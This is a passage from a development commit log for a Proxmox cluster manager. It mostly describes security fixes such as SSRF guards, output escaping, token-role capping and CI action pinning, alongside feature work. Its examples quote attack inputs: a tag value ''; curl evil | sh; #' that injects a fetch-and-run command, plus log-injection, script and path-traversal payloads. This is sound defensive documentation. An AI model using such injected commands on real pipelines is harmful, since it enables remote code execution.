tag — until then the prior behaviour (working push, slow cache-miss
rebuild) is the worst-case fallback.

* fix(security): aikido manual-ports — vSphere URL guard + SHA256 update integrity

Two Aikido autofix PRs that contained useful security improvements but
needed manual-port treatment (their PRs added markdown-only docs or
runner-scripts instead of the actual source edit — same anti-pattern
as the closed #485). Ports below extract just the substantive fix
from each.

#489 vmware SSRF guard (manual port of Aikido PR #489)
─ `VMwareManager.api_get(path, ...)` was concatenating `f"{base_url}{path}"`
  with no defence against a `path` argument that contained `..` traversal
  or a stray query/fragment. All 15 current callsites pass hardcoded
  literals or f-strings with internally-looked-up IDs, so SSRF is not
  exploitable today — but a future refactor that lets external input
  near `path` would weaponise it.
─ Added `_build_validated_url(path)` helper:
    * rejects path that doesn't start with `/`
    * rejects literal `../` and URL-encoded `%2e%2e` traversal
    * reconstructs URL via urlparse._replace so any embedded query/
      fragment in `path` is silently dropped instead of forwarded
─ `api_get()` now routes through the helper and catches the ValueError
  to surface a clean 'invalid path' error instead of an exception.

#473 update-archive integrity (manual port of Aikido PR #473)
─ `perform_pegaprox_update()` previously downloaded the GitHub /
  mirror tar.gz with zero authenticity verification, then ran
  `pip install -r requirements.txt` on whatever the archive
  contained. Attacker who controlled the mirror could plant a
  malicious requirements.txt and get code-exec on the host the
  next time an admin clicked Update.
─ Now: compute SHA256 streaming while writing the archive, then
  verify against `remote_version['archive_sha256']` (a new field
  in version.json). On mismatch: HTTP 400 + audit
  `pegaprox.update_failed`. On no-hash: warn + proceed for
  backwards-compat (existing mirrors without the field keep
  working).
─ `requirements.txt` added to PROTECTED list so the existing
  protected-path overwrite-guard in this function also catches
  the malicious-deps vector at the file-replace stage (defence in
  depth on top of the hash check).

Skipped from those PRs:
─ #489's pull-request payload was code-correct, just lacked the
  `_replace(path=...)` query/fragment scrub on the new path which
  this version adds.
─ #473 had +160 lines of PENTEST_FIX_UPDATE_INTEGRITY.md + 20 lines
  of SECURITY.md narrative — those are repo-pollution, not shipped.
  The version.json `archive_sha256` schema-add is a release-cut
  task (do at next tag, not on every Testing-side hotfix).

Both PRs being closed with a pointer to this commit.

* revert: drop SHA256 update-integrity port from 203f957 — wrong threat model

Nico flag: pegaprox is distributed from GitHub `archive/main.tar.gz`,
which is NOT a stable artifact — GitHub repackages periodically (gzip
compression changes, file ordering shifts) so the SHA256 of the tarball
moves even when the underlying commit doesn't. version.json can only
carry one hash at a time, and we don't push to main on every update
that would refresh that hash. Net effect of the port: every update
would fail with `hash mismatch` until someone refreshed the hash
manually, on what's already a rolling distribution.

Also walking back `requirements.txt` in PROTECTED — that block prevents
overwrite during update (via `is_protected(rel_path)` at settings.py
line 507/566). Adding requirements.txt to the list means legitimate
dep-version bumps in a release would silently skip the install side,
leaving operators on stale pinned packages and confused about why a
new feature's deps aren't there. The threat model the original PR was
defending against — "tampered archive injects malicious requirements.txt
that pip then executes" — is real only if an attacker controls the
archive source. For us that's the GitHub repo itself, and if an
attacker has push there, requirements.txt is the least of our worries.

Keeping the #489 vmware SSRF port from the same commit — that one was
defence-in-depth on already-hardcoded callers, no breakage risk.

The right path for update-integrity, if we want it later, is:
─ Sigstore / cosign signatures on tagged release archives (CI-attestable,
  doesn't require static hash files)
─ OR ghcr.io image verification for docker users (cosign signed images,
  most distros' default workflow anyway)
Neither belongs in a hotfix.

* security: SSRF guard on OIDC test endpoint, vmware api_post/api_delete, status_page XSS hardening

Manual port of three Aikido autofix PRs (#490, #491, #492). Bundled because
they're all defense-in-depth at the SAST level; no functional change.

- pegaprox/api/auth.py — oidc_test_connection() now runs sanitize_outbound_url()
  on endpoints['authorization'] (Step 2) and endpoints['jwks'] (Step 3) before
  hitting requests.get(). Same pattern as utils/oidc.py:159/304/453; honours
  the existing oidc_allow_private_ip toggle so on-prem Authentik/Keycloak
  realms don't break. Discovery-phase guard at utils/oidc.py:159 already
  covered the issuer URL itself — this closes the case where discovery succeeds
  but the published .well-known doc points its auth/jwks at internal IPs.

- pegaprox/core/vmware.py — api_post() and api_delete() now run
  _build_validated_url() (added in 203f957). Closes the gap I missed when
  porting #489: api_get() was wrapped but the POST/DELETE callers were not.
  Path traversal (/../ and /%2e%2e/) gets rejected with {'error': 'invalid
  path: ...'} the same way api_get() does.

- plugins/status_page/__init__.py — _update_config() now int-clamps
  pbs_stale_hours (1-8760, default 48) and refresh_interval (5-3600, default
  30) before persisting. status.html renders these as text via escapeHtml,
  but the clamp is defence-in-depth so a future template change that drops
  escapeHtml can't leak a stored payload.

- plugins/status_page/status.html — _stripDangerousNodes() now catches
  namespaced attribute variants (xlink:href, ev:href, …) carrying
  javascript:/data:/vbscript: payloads. Plus escapeHtml(String(...)) on the
  one remaining render-line that interpolated pbs_stale_hours directly.

Unit + E2E verified against localhost:5000:
- vmware path validator: 6/6 (valid path / /../ / %2e%2e/ / missing slash /
  api_post traversal / api_delete traversal)
- OIDC SSRF guard: 4/4 E2E (loopback reject, file:// reject, empty reject,
  google.com flow accepts past new Step 2 + Step 3 with status:ok)
- status_page clamp: 5/5 E2E (<script> payload → 48, "abc" → 30, 0 → 48,
  99999 → 48, valid 72/60 persisted)
- status.html delivery: HTTP 200, patched JS present, HTMLParser clean

* security: HTML-escape alert email payloads + strip CR/LF from audit log lines

Manual port of two Aikido autofix PRs (#493, #494). Bundled — both are output-
neutralisation fixes against attacker-controlled strings reaching a structured
stream (HTML email / text log).

pegaprox/background/alerts.py — three email templates now run user-controlled
fields through html.escape() before they hit the HTML body:

  1. check_and_send_alerts() — alert_name/target_name/target_type/metric/
     operator (rule definitions are admin-editable but the alert engine
     also accepts target names from the manager state, which mirrors PVE
     VM/node names — an attacker who can name a VM "<script>..." would
     otherwise inject script into the on-call recipient's mail client).
  2. check_update_available_alert() — escapes latest version + release date
     + each changelog line + download_url. The update server is trusted
     today, but if the mirror is ever compromised, the release-notes path
     is exactly where an attacker could drop a payload that runs in the
     admin's mail client.
  3. _emit_node_status_event() — same shape, plus rename the local `html`
     variable to `html_email` so it doesn't shadow the `html` stdlib
     import we now rely on.

The `html` module is imported as `html_lib` to avoid the shadowing trap
across the whole file. Numeric fields (threshold, current_value) flow
through `:.1f` format specs which already coerce them safely; left
unescaped.

pegaprox/utils/audit.py + pegaprox/utils/sanitization.py — new
sanitize_log_message() helper (Layer 2), called by log_audit() against
user/action/details/cluster before writing the text log line. Strips CR
(\r), LF (\n), and the unicode line separators U+2028/U+2029. Tabs left
intact (legitimate inside some action strings). The structured DB row
keeps the raw value — sanitisation only applies to the text stream.

CWE-117 / OWASP Log Injection. Defense against an attacker submitting
a username like "alice\nAudit: admin - deleted_all - faked" that would
otherwise produce a second fake-looking audit line.

Verified:
- log_audit unit-test: CR/LF/U+2028 in all 4 fields → single-line output,
  no separators surviving; DB write path called with raw values
- alerts.py HTML-render unit-test: HTML-parser sees only template tags
  (<h2>, <p>, <table>, <tr>, <td>); zero <script>/<img>/<svg>/<iframe>
  surface from payloads in 7 user-controlled fields
- import smoke: both modules + audit + sanitization import clean
- live server: running pegaprox audit-logs continue to fire normally
  ("Audit: pegaprox - user.logout - User logged out")

* fix: site-recovery — allow re-running planned/emergency from completed/failed (#413 layer 5)

The atomic transition `WHERE status = 'ready'` rejected every subsequent
attempt after the first successful failover. blackshocks' support bundle
made it clear: VM 104 went through qmigrate OK at 14:13:58 and his next
click came back as a 409 with the (very) misleading "concurrent failover
may be in progress". Nothing concurrent — the plan was just no longer in
'ready'.

Expanded the WHERE set to ('ready', 'completed', 'failed') in both
execute_failover() (planned) and execute_emergency_failover(). The
'running' / 'testing' branches still hit the early-return at the top of
each handler, so concurrent-call protection is unchanged. Replaced the
ambiguous race-detection message with one that names the actual state so
operators know what they're looking at.

Test failover already worked because its UPDATE has no status filter; this
brings planned + emergency in line with that behaviour.

E2E (Flask test-client with mocked cluster managers + _safe_spawn_failover
patched to no-op so the worker doesn't actually run):

  planned + emergency, plan state →
    ready       → 200, status=running         (unchanged)
    completed   → 200, status=running         (was 409 — fixed)
    failed      → 200, status=running         (was 409 — fixed)
    running     → 409 "already in progress"   (unchanged, top-of-handler)
    testing     → 409 with named state        (was 409 race-msg — clearer)

* security: API-token role-refresh + SSH-WS SSRF + cross-cluster BOLA (CodeAnt May)

Three CodeAnt findings, one validated-and-patched batch. All three are
chained: closing the SSRF makes the BOLA mostly moot, but I still went
through and bound the WS token to a cluster scope for defense-in-depth.

1) CWE-269 — pegaprox/utils/auth.py require_auth() (~line 834)
   API-token sessions had their role silently refreshed to the owner's
   current DB role on every request. An admin creating a 'viewer' token
   for CI/CD got an admin token back — the role assigned at creation was
   overwritten by user.get('role'). Fix: when session['api_token']=True,
   keep the token-bound role and *cap* it at the user's current role
   (min(token, user)) so a demotion still applies. Session auth still
   refreshes from the user record as before.

2) CWE-918 — pegaprox/api/vms.py inline server_script (shell handler +
   termproxy_handler)
   The SSH-WS server had two SSRF surfaces:
   - ?ip=<URL-query> was used as node_ip without validation when present
   - creds.host=<JSON> overrode node_ip unconditionally
   Either path let an authenticated user turn PegaProx into an SSH jump
   host into arbitrary internal IPs. Fix: always resolve cluster-creds,
   build allow_hosts = {cluster_host} ∪ node_ips.values(), require both
   the prefetched and the override IP to be in that set. Empty set
   (cluster-creds totally failed) rejects everything.
   Same gate added to termproxy_handler against pve_host query param.

3) CWE-285 — pegaprox/api/realtime.py /api/ws/token/validate +
   pegaprox/api/vms.py inline server_script
   WS tokens were issued without cluster scope and the validate endpoint
   only checked existence/expiry. The SSH-WS server now passes
   ?cluster_id=<id> from the request URL to the validate call. Validate
   runs check_cluster_access against the token user (with VM-ACL
   fallback). cluster_id is optional for back-compat with VNC callers in
   vms.py that haven't been updated yet.

The .ssh_ws_server.py file is generated at runtime by pegaprox/api/vms.py
(write to disk + spawn subprocess). Both the inline source and the
regenerated artefact are committed for consistency with prior history.

E2E verified against localhost:5000 + ssh-ws on :5002:
- viewer-token → GET /api/users (admin-only) → 403 (was 200 pre-fix)
- viewer-token → GET /api/clusters (viewer-allowed) → 200 (no regression)
- WS-token validate ?cluster_id=allowed → 200
- WS-token validate ?cluster_id=disallowed → 403 with named state
- WS-token validate ?cluster_id missing → 200 (back-compat preserved)
- WS-token validate ?cluster_id=disallowed but user in VM-ACL → 200
- SSH-WS ?ip=10.99.99.99 (forged) → close 1008 "not a known node"
- SSH-WS creds.host=10.99.99.99 → close 1008 "Manual override blocked"

* security: kill plain-JSON config fallbacks — encrypted DB is the single source of truth

After the v0.9.10 SQLCipher migration the legacy plain-JSON files in config/
should never be re-read at runtime — anything sensitive only exists in the
encrypted DB now. The leftover fallback paths (kept "for backwards compat")
quietly re-introduced a plain-text spill if the DB ever failed to load.
Worse, the SSH-WS Method 2 fallback ran on *every* shell connection, looking
for clusters.json in seven locations including a stale absolute path from a
different operator's deployment.

Removed runtime fallbacks (DB-failure path → defaults, not legacy JSON):
- pegaprox/core/config.py _load_config_legacy() — kept Fernet-encrypted .enc
  branch (defense-in-depth, already encrypted), dropped plain CONFIG_FILE
- pegaprox/utils/rbac.py load_tenants() — dropped TENANTS_FILE branch
- pegaprox/utils/rbac.py load_custom_roles() — dropped CUSTOM_ROLES_FILE branch
- pegaprox/api/storage.py _load_esxi_config() — dropped ESXI_CONFIG_FILE branch
- pegaprox/api/storage.py _load_storage_clusters_config() — dropped
  STORAGE_CLUSTERS_FILE branch
- pegaprox/api/helpers.py load_server_settings() — dropped SERVER_SETTINGS_FILE
  branch
- pegaprox/api/vms.py inline ssh_ws_server (+ regenerated .ssh_ws_server.py) —
  dropped Method 2 (config/clusters.json on seven paths including a stale
  absolute /home/admin_321/... path). Method 1 (cluster-creds API) stays as
  the only legitimate source. If it fails the shell connection fails — fixing
  the cluster config is the right recovery, not a plain-JSON spill.

KEPT (one-shot migration code in core/db.py):
- _migrate_clusters reading CONFIG_FILE
- _migrate_alerts reading ALERTS_CONFIG_FILE
- _migrate_server_settings reading SERVER_SETTINGS_FILE
- These run once per upgrade and are the only legit reason to touch the
  legacy files. They stay.

Constants in pegaprox/constants.py (CONFIG_FILE / TENANTS_FILE / etc.) are
unchanged because the migration code still references them.

Verified by planting poison plain-JSON files (evil-cluster, EVIL_ROLE,
evil-tenant, evil_setting) in config/ and forcing get_db() to raise across
the 5 load functions — all 5 returned defaults/empty rather than picking up
the poison. Cleanup removed the planted files. Existing DB-backed loads
still return real data (3 users, 4 clusters, 1 tenant) on the live server.

Net: 6 files, +36 / -112 lines.

* fix: cluster-creds session attach + WS-token validate carries cluster context

Two related fixes pulled out of the post-cleanup E2E sweep:

1) get_cluster_creds_internal (auth.py:1141) was raising AttributeError
   because check_cluster_access reads request.session['user'] — a slot
   normally populated by @require_auth(). This endpoint does its own
   cookie-based session validation (no decorator) and never attached the
   resolved session to the request, so every call after the March 2026
   commit f8c12d54 returned 500 instead of doing the access check. The
   SSH/VNC shell flow depends on this endpoint, so the failure was
   silently degrading multi-node deployments via the now-removed
   clusters.json fallback. Fix: attach the session to request after
   validation, before check_cluster_access runs.

2) After dropping Method 2 (plain-JSON fallback) the SSH-WS subprocess
   was stuck — its ws-token doesn't authenticate against the cluster-
   creds endpoint (no session cookie), and Method 1 returned 401 every
   time. Extended /api/ws/token/validate to optionally return
   `cluster_context = {host, node_ips, ssh_port}` when called with
   ?cluster_id=. The SSH-WS shell + termproxy handlers now read that
   directly instead of doing a second authenticated round-trip. Stays
   lightweight — pulls only what's already cached on the manager
   (cluster.host + config.fallback_hosts + config.ssh_port). No network
   probe; validate stays sub-200ms even when _get_node_ip would otherwise
   stall for ~15s on the first cold call.

E2E:
  HAPPY PATH: ws://…/shellws?token=…       → server resolves cluster.host
                                              (allowManualIp:false)
  LEGIT IP:   ws://…/shellws?token=…&ip=fallback  → accepts (allow-list match)
  FORGED IP:  ws://…/shellws?token=…&ip=10.x.x.x  → close 1008
  HOST OVERR: creds.host=10.x.x.x                → close 1008
  CROSS-CL:   ws://…/clusters/FAKE-…             → allowManualIp:true but
                                                    allow-list empty → all
                                                    overrides rejected

Multi-node clusters where the frontend prefetches an IP that's not in the
manager's fallback_hosts list will fall through to manual-entry mode. The
right follow-up (cheap node_ip cache exposed to validate) is parked for
a separate change — out of scope for the cleanup.

Prior fixes verified still in place:
  - viewer API-token → /api/users → 403 (CodeAnt CWE-269 holds)
  - OIDC test connection to google.com → all 6 steps OK (CWE-918 SSRF gate)
  - status_page pbs_stale_hours="<script>" → clamped to 48

* update_files: add worldmap.js + world-countries.svg to manifest

Both shipped on disk via the GitHub archive after the worldmap feature
landed in 5b0a1b5 but were never added to the per-file update_files list.
Same trap as the December v0.9.9.1 incident with dr_drill.py / hello_world
example plugin / theme-aware logo set — when the updater falls through to
the file-by-file fallback (mirror 404 / archive download glitch), missing
manifest entries leave a customer with a partial install. WorldMap would
have failed to render with the sidebar entry pointing at a 404 JS file.

Two new entries:
  web/assets/world-countries.svg   — slotted into the existing alphabetical
                                     web/* section (first web/assets/ entry)
  web/src/worldmap.js              — after vnc_secure_socket.js, before sw.js

Manifest now lists 227 files (was 225). No version/build bump — manifest
fixup, not a code change. The pre-release CI check from v0.9.9.1 should
have caught this; will investigate why it didn't on the next release cut.

* security: aikido batch 2026-05-30 — 4 manual ports, 9 PRs rejected/closed

Reviewed 13 Aikido autofix PRs opened around 10:00 UTC. Six against Testing,
seven against main. Two carried broken `allowed_domains = ["example.com"]`
placeholder allow-lists that would have broken push notifications and XCP-ng
migrations outright; one against main had a syntax error (`print(f\"...\")`);
one removed `verify=False` on a PVE call that has to tolerate Proxmox's
default self-signed certs. Closed all 9. The four valid ones are ported here
verbatim against Testing:

#504  pegaprox/api/auth.py
  oidc_test_connection now uses the URL returned by sanitize_outbound_url()
  rather than the raw input — that way the outbound request hits exactly
  what the guard validated (the helper normalises the URL via urlparse +
  re-encode). Micro fix, both Step 2 and Step 3 of the test.

#500  pegaprox/utils/oidc.py
  New build_validated_discovery_url() pre-checks scheme / hostname /
  path-traversal on the admin-supplied authority *before* composing the
  discovery URL. The existing sanitize_outbound_url() guard further down
  catches the same family of attacks one step later — this fails fast with
  a structured `_error_detail` instead of letting a malformed authority
  reach any I/O. get_oidc_endpoints surfaces `invalid_authority_url` on
  rejection so the UI shows a clean message.

#502  pegaprox/core/xcpng.py
  Two defensive URL builders (`_build_xapi_import_vdi_url`,
  `_build_xapi_rrd_url`) replace the raw f-strings in upload_to_storage
  (line 2576) and _rrd_fetch (line 2621). host_url is server-derived from
  cluster config so direct SSRF was a stretch, but pre-validating
  session_id / vdi_uuid / rrd_path keeps the surface clean if a future
  caller starts passing externally-influenced values.

#507  pegaprox/core/manager.py
  realpath/commonpath gate on four HA recovery file ops: _ha_check_node_
  agent_heartbeat (read), _ha_write_poison_pill (write), _ha_wait_for_
  poison_ack (read), _ha_acquire_recovery_lock (read + write). Files are
  written/read by us today but the path-traversal vector goes live the
  moment a node-name expression slips into the path-build code. Defence
  in depth.

E2E:
  - Unit-tests: 9/9 (path-traversal / bad scheme / bad VDI / bad RRD path
    all rejected; valid public URL accepted; trailing slash handled)
  - HTTP: OIDC test on google.com all 6 steps OK (new validated_auth_url +
    validated_jwks_url paths fire and the response uses the normalised URL)
  - HTTP: OIDC test with `https://idp/../etc/passwd` rejected at the new
    'Endpoint Resolution' step with structured detail
  - Regression: API-token role-refresh fix still 403, worldmap SVG still 200,
    no new ERROR/Traceback in boot log (the existing XCP-ng XAPI 302
    redirects predate this change)

PRs closed (commented + closed separately): #495, #496, #497, #498, #499,
#501, #503, #505, #506.

* ux: sort CPU type dropdown — host first, max second, rest alphabetical

Two surfaces hit the same problem:

- pegaprox/core/manager.py — get_cpu_types() returned the raw PVE enum order
  (host/kvm64/kvm32/qemu64/qemu32/max/x86-64-v2/Broadwell/Cascadelake/EPYC/…)
  which is the order PVE built the C enum in, not anything an operator
  finds useful when scrolling through 60+ models. New _sort_cpu_types
  pins `host` (the default we set on every new VM) and `max` at the top,
  then sorts the rest alphabetical (case-insensitive so `athlon`/`Broadwell`/
  `core2duo` interleave the way a human reads them).

- web/src/create_modals.js — VM Create modal had its own hardcoded ~60-
  entry array in PVE enum order, unrelated to the backend list. Reshaped
  to use the same head-then-alpha pattern via an IIFE so the dropdown in
  Create matches the dropdown in Config now.

While here, fix a passive-listener console-spam in worldmap.js — the
zoom-on-wheel handler called e.preventDefault() inside React's onWheel
synthetic prop, which since React 17 registers as passive, so every wheel
event logged "Unable to preventDefault inside passive event listener
invocation" to the browser console (saw ~30 in a row in Nico's paste).
Switched to a useEffect that attaches via addEventListener with
{passive: false} on the container ref + a function-ref so the closure
sees the latest vbW/vbH/vbX/vbY without rebinding the listener on every
zoom.

E2E:
  - _sort_cpu_types unit-tests: 7/7 (typical static / live shape / no
    host / no max / empty / dupes / case-insensitive interleave)
  - GET /api/hardware-options on the lab cluster: 94 cpu_types returned,
    host first, max second, rest sorted casefold ✓
  - Compiled web/index.html: cpuTypes IIFE present, worldmap wheel
    listener attached via addEventListener {passive: false}

* feature: Add PVE node subscription management (#508)

* Add link to Plugins in README

* feature: Add PVE node subscription management
  Adding centralized subscription management for PVE nodes
  of a selected cluster. Allowing management (add, view, delete)
  of subscriptions within the datacenter chapter.

---------

Co-authored-by: Nico Schmidt <77726945+MrMasterbay@users.noreply.github.com>

* Create release-images.yml

* fix(#508): mask subscription key in cluster-wide aggregator + clusterId dep on lazy sections

Two CodeAnt findings on the subscription-management merge.

api/datacenter.py — get_datacenter_subscriptions is gated by cluster.view
(read-only role), which meant every read user could hit one URL and walk
away with the license key for every node in the cluster. PVE itself
gates subscription detail behind Sys.Audit, so matching that intent.
New _mask_subscription_key helper redacts everything except the last
four characters in the aggregator response. The per-node read
(/nodes/<n>/subscription, node.view) still returns the raw key so the
rotation flow that already exists keeps working unchanged; admin.settings
is still what gates the writes.

web/src/datacenter.js — the useEffect that lazy-loads ceph / metric-
server / subscriptions only depended on activeSection, so switching
clusters while parked on one of those tabs left stale node rows from
the previous cluster on screen. Added clusterId to the dep list. Same
useEffect handles all three lazy sections, so the fix covers ceph and
metric-server too.

Verified _mask_subscription_key on a 28-char PVE-style key (24 dots +
last 4), short keys (≤8 chars) passed through unchanged, None/'' return
''. Frontend rebuilt — compiled index.html carries [activeSection,
clusterId] now.

* fix(#509): make SQLCipher cipher_memory_security env-controlled with smart auto

davinkevin reported sqlcipher_mlock warnings flooding the container log
~2 lines / second on a default k3s install. Root cause: the bundled
sqlcipher3-binary wheel compiles with memory-security on, mlock(2)
needs root or CAP_IPC_LOCK or a fat RLIMIT_MEMLOCK, and a default
non-root container has none of those — the lock fails with ENOMEM on
every connection open and writes a WARN line. The at-rest encryption
is unaffected; only the in-memory page cache stops being pinned.

New env knob (pegaprox/core/dbcrypto.py):

  PEGAPROX_CIPHER_MEMORY_SECURITY=auto   default; heuristic decides
  PEGAPROX_CIPHER_MEMORY_SECURITY=on     force-enable (bare metal / root)
  PEGAPROX_CIPHER_MEMORY_SECURITY=off    force-disable (rootless containers)

The auto path treats `os.geteuid() == 0` as "mlock will work" and
otherwise probes `RLIMIT_MEMLOCK` — needs a soft limit of at least
8 MiB to call mlock viable. Both _resolve_memory_security_setting()
and _mlock_likely_works() unit-tested with the env-var matrix; live
DB connect verified that `PRAGMA cipher_memory_security = OFF`
returns the expected 0 and that the existing sqlite_master smoke
read still passes (139 rows on the dev DB).

Schreibtisch docs.html updated in the Docker Deployment section: env
var added to the table, plus a new Kubernetes / k3s / rootless block
explaining the symptom, the threat-model nuance, and the rlimit /
securityContext workarounds for operators who'd rather keep the
mlock active.

* fix(logging): demote per-node status line from info to debug (PR #510)

davinkevin filed PR #510 against main pointing this out: get_node_status
logs a per-node `CPU X%, RAM Y%, Score Z, Status: online` line at INFO on
every poll. On a 5-cluster × 6-node fleet at the default poll interval
that's ~720 lines/h of routine metrics carrying no actionable signal —
floods stdout, k8s log collectors, journald.

Per-node metrics are still available in the web UI + in-memory history
buffer + `/api/metrics` exporter, so the log line is redundant at INFO.
WARNING/ERROR paths (HA, offline, drift) are untouched. Operators who
want the per-tick line back can flip PEGAPROX_LOG_LEVEL=DEBUG.

Ported from PR #510 (targeting main) onto Testing — line had moved from
1413 to 1433 since davinkevin's branch was cut, so a straight merge
wasn't clean.

Co-authored-by: Davin Kevin <davin.kevin@gmail.com>

* security: SHA512-verify Debian cloud image in release-images.yml (mirror of b6c7f9e on main)

Same supply-chain fix that just landed on main (b6c7f9e) applied here too,
so the next Testing → main merge doesn't bring the unverified wget back
and the workflow on both branches stays in sync.

Identical logic — only the resize size differs: Testing carries
`qemu-img resize pegaprox.qcow2 8G`, main carries `20G`. That divergence
predates this change.

* security: pin all 3rd-party actions + template-injection fix (CodeAnt #511 + #512)

Two CodeAnt findings on Testing, ported together because they touch the
same workflows and "pin one action while the other six float on a moving
tag" looked worse than no pinning at all.

#511 — release-images.yml `prepare/ver` step interpolated
${{ github.event.release.tag_name }} and ${{ inputs.tag }} directly into
the `run:` shell script. The interpolation happens before the shell sees
the value, so a tag like  `'; curl evil | sh; #`  would escape into the
script. Only repo-write users can push tags or dispatch the workflow, so
external exploitability is zero, but the pattern is a textbook CI escape.
Switched to `env:` block + `"$RELEASE_TAG_NAME"` shell-var reads.

#512 — Aikido's PR pinned only `actions/upload-artifact@v4` and left the
six other 3rd-party refs (`actions/checkout`, the five `docker/*-action`s,
`actions/download-artifact`, `softprops/action-gh-release`,
`actions/github-script` in issue-validator) on moving major-tags. Pinning
one but not the others is the worst of both worlds — release-build is
still vulnerable to a re-tag of any of the unpinned six. Pinned every
3rd-party action across all three workflows to the latest commit SHA in
the currently-used major version. Tag is in the trailing comment so
dependabot / renovate can bump these via PR without humans hunting SHAs.

SHAs resolved from `gh api repos/<owner>/<repo>/git/refs/tags/<tag>` at
2026-05-30 21:10 UTC; majors held at v4/v3/v5/v7/v2 to avoid sneaking a
breaking upgrade into a security commit.

  actions/checkout              v4 → v4.3.1   34e114876b0b11c390a56381ad16ebd13914f8d5
  actions/upload-artifact       v4 → v4.6.2   ea165f8d65b6e75b540449e92b4886f43607fa02
  actions/download-artifact     v4 → v4.3.0   d3f86a106a0bac45b974a628896c90dbdf5c8093
  actions/github-script         v7 → v7.1.0   f28e40c7f34bde8b3046d885e986cb6290c5673b
  docker/setup-qemu-action      v3 → v3.7.0   c7c53464625b32c7a7e944ae62b3e17d2b600130
  docker/setup-buildx-action    v3 → v3.12.0  8d2750c68a42422c14e847fe6c8ac0403b4cbd6f
  docker/login-action           v3 → v3.7.0   c94ce9fb468520275223c153574b00df6fe4bcc9
  docker/metadata-action        v5 → v5.10.0  c299e40c65443455700f0fdfc63efafe5b349051
  docker/build-push-action      v5 → v5.4.0   ca052bb54ab0790a636c9b5f226502c73d547a25
  softprops/action-gh-release   v2 → v2.6.2   3bb12739c298aeb8a4eeaf626c5b8d85266b0e65

* release: bump to v0.9.12.0 (build 2026.05.30) — Testing only, no tag yet

All five surfaces aligned per the version-bumping checklist:
  pegaprox/constants.py    PEGAPROX_VERSION = "Beta 0.9.12.0"  / PEGAPROX_BUILD = "2026.05.30"
  web/src/constants.js     PEGAPROX_VERSION = "Beta 0.9.12.0"
  version.json             version=0.9.12.0  build=2026.05.30  release_date=2026-05-30
  README.md                version badge → 0.9.12.0-beta
  web/index.html           rebuilt — PEGAPROX_VERSION="Beta 0.9.12.0"

version.json changelog gets a new top entry summarising the v0.9.12.0
train (vacation R3 wrap-up): #509 davinkevin SQLCipher mlock heuristic,
#510 davinkevin per-node-status info→debug, gyptazy PRs #429 (ACME
DNS-01) + #508 (PVE subscription management with key-mask), #413
blackshocks SR layer 5, the CodeAnt batch (API-token role-refresh, WS
cluster scope, SSH-WS SSRF, vmware path-traversal, OIDC discovery
pre-validation, subscription-key mask, useEffect clusterId dep), the
Aikido May-30 batch (3rd-party action SHA pinning, template-injection,
Debian cloud-image SHA512 verify), plain-JSON config fallback removal,
CPU dropdown sort, worldmap wheel passive-listener fix, first-run setup
wizard, alert-email html-escape, audit-log CRLF strip, ACME directory
SSRF guard, version.json worldmap-files manifest gap.

No tag, no GitHub release cut — that decision is yours. Testing-only
push so the build line on dev installs flips to 0.9.12.0 today; the
mirror upload + docs.pegaprox.com pass still pending until you give the
release-cut OK.

* sr: create_api_token retries past stale 'Token already exists'

#413 layer 6 (blackshocks 20260530_220647 bundle): Planned Failover
fails on cl2 with PVE "Parameter verification failed" / "Token already
exists" — the same 'pegaprox-sr' token from a prior failover attempt
was still on the target user, so the create POST was 400 before any
qmigrate could run. Failback hits the same wall in the opposite
direction. create_api_token now detects the 'already exists' response,
DELETEs the stale token, and retries the create exactly once. The
existing _delayed_cleanup grace path stays — this just makes the
front of the call idempotent.

- MK

* monitoring: SMART data viewer modal (replaces alert(JSON))

Node detail → Disks tab → SMART button used to alert(JSON.stringify())
the raw payload, which was useless for actually triaging a sketchy disk.

New SmartModal component renders parsed PVE smartctl output:
- Health badge (PASSED / FAILED / N/A with colour)
- NVMe detail block (temp, wear-%, power-on h, power cycles,
  unsafe shutdowns, media errors - latter red on >0)
- SATA/SAS key-attributes table (Reallocated_Sector_Ct,
  Pending, Temperature, Power_On_Hours, Wear, Uncorrect) -
  raw count >0 on the pending/reallocated rows lights red
- "All attributes" collapsed below + raw JSON dump at the very
  bottom for SMART nerds

Modal is keyed on the disk row's row-action so existing list/
button wiring stays. Closes on ESC via outer-div click.

- LW

* monitoring: per-NIC traffic + error/drop counters

Node → Network tab now carries a second table under the existing
bridge/bond config list: Interface Statistics, one row per NIC
from /proc/net/dev (SSH, /api/clusters/<id>/nodes/<n>/netstats).

Columns: RX bytes / packets / errs / drop, TX bytes / packets /
errs / drop / collisions. Non-zero err/drop/coll cells render in
red so a flapping uplink jumps out.

PVE's REST surface has aggregate /rrddata netin/netout but never
per-NIC errors — this is the one stat operators always end up
SSHing for when chasing dropped packets, so we may as well do it
once and surface it cleanly. Falls back to a silent hide on the
loopback iface (lo never has interesting numbers anyway).

- MK

* monitoring: top-N noisy neighbors on Insights tab

New /api/clusters/<id>/insights/top-talkers endpoint sorts the
cluster's VMs by a chosen metric (cpu | memory | disk_usage |
disk_io | net_io) and returns the top N. Pure aggregator over
/cluster/resources, no history table needed.

CPU / Memory / Disk usage are PVE's instantaneous percentages
(cpu_percent etc.). Disk I/O and Net I/O sort by cumulative
diskread+diskwrite / netin+netout since VM boot — that's the
"which VMs have moved the most data" proxy for noisy-neighbour
triage. For instantaneous rates we'd need RRD deltas; not the
ask here.

Frontend: new Top Talkers card on the Insights tab between
Capacity Forecast and Right-sizing, with metric selector and
the picked column highlighted. Defaults to CPU on tab open.

- MK (backend)
- LW (UI)

* i18n: monitoring expansion strings across DE/EN/FR/ES/PT/KO/IT

84 strings (12 new keys × 7 langs) for the Top Talkers card,
Interface Statistics table and SMART modal that landed in
629c19c / 384e8ed / 75f6e58. The `|| 'English fallback'` in
the JSX still works for any key we missed, but having the real
translations means DE/FR/ES/PT/KO/IT actually shows in those
locales instead of the English fallback.

New keys: topTalkers, topTalkersHint, cpuPercent, memoryPercent,
diskUsagePercent, diskIo, netIo, runningVms, interfaceStatistics,
errOrDropHint, keyAttributes, allAttributes.

- LW

* monitoring: SMART modal accepts 'OK' health (not only 'PASSED')

E2E test on a QEMU virtual disk showed health='OK' (from PVE's
SCSI/QEMU wrapper) which my colour-bucket logic put into the
yellow "unknown" tier. SATA disks usually return 'PASSED', SCSI
sometimes 'OK', actual failure is 'FAILED'. Case-insensitive now,
both PASSED and OK go green.

- LW

* monitoring: enrich /guest-info with NICs / FS / users / clock-skew

Existing /guest-info kept the same hostname/os/kernel/ip_addresses
fields (so the legacy summary table renders unchanged), and adds:

  - kernel_version: full uname-style string (was only kernel-release)
  - interfaces[]:   per-NIC {name, mac, ips:[{address,family,prefix}]}
